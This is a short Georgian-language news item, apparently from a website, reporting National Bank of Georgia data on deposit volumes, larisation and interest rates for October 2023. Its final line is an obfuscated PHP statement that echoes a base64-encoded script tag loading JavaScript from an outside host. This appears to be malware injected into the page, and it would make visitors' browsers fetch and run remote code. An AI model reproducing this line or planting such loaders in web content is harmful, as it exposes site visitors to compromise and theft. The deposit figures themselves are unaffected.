celsiusi
ავერსი საქკაბელი

საქართველოს ეროვნული ბანკის ანგარიშის მიხედვით, საბანკო სექტორში განთავსებული არასაბანკო დეპოზიტების მოცულობამ 2023 წლის ოქტომბრის ბოლოსათვის 49.84 მლრდ ლარი შეადგინა, რაც 507.96 მლნ ლარით, ანუ 1.03 პროცენტით მეტია წინა თვის ბოლოს არსებულ მაჩვენებელზე.

ცენტრალური ბანკის ცნობით, ოქტომბერში, წინა თვესთან შედარებით, ადგილი ჰქონდა ვადიანი დეპოზიტების ზრდას 701.22 მლნ ლარით, 3.63%-ით, ხოლო მოთხოვნამდე დეპოზიტები 193.25 მლნ ლარით, 0.64%-ით შემცირდა.

სებ-ის ანგარიშის მიხედვით, დეპოზიტების ლარიზაციის კოეფიციენტმა 2023 წლის ოქტომბრის ბოლოსთვის 49.67 პროცენტი შეადგინა. წინა თვის ბოლო მდგომარეობასთან შედარებით, დეპოზიტების ლარიზაცია შემცირდა 0.15 პროცენტული პუნქტით.

ამასთან, ეროვნული ბანკის მონაცემებით, ოქტომბერში ვადიან დეპოზიტებზე საშუალო წლიურმა შეწონილმა საბაზრო საპროცენტო განაკვეთმა 8.16 პროცენტი შეადგინა, მათ შორის, ეროვნული ვალუტით განთავსებულ დეპოზიტებზე – 10.44%, ხოლო უცხოური ვალუტით განთავსებულ დეპოზიტებზე – 2.09%.

უცხოური ვალუტით განთავსებულ დეპოზიტებში აშშ დოლარის წილმა – 78.18 პროცენტი, ხოლო ევროს წილმა 19.74 პროცენტი შეადგინა.

293
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");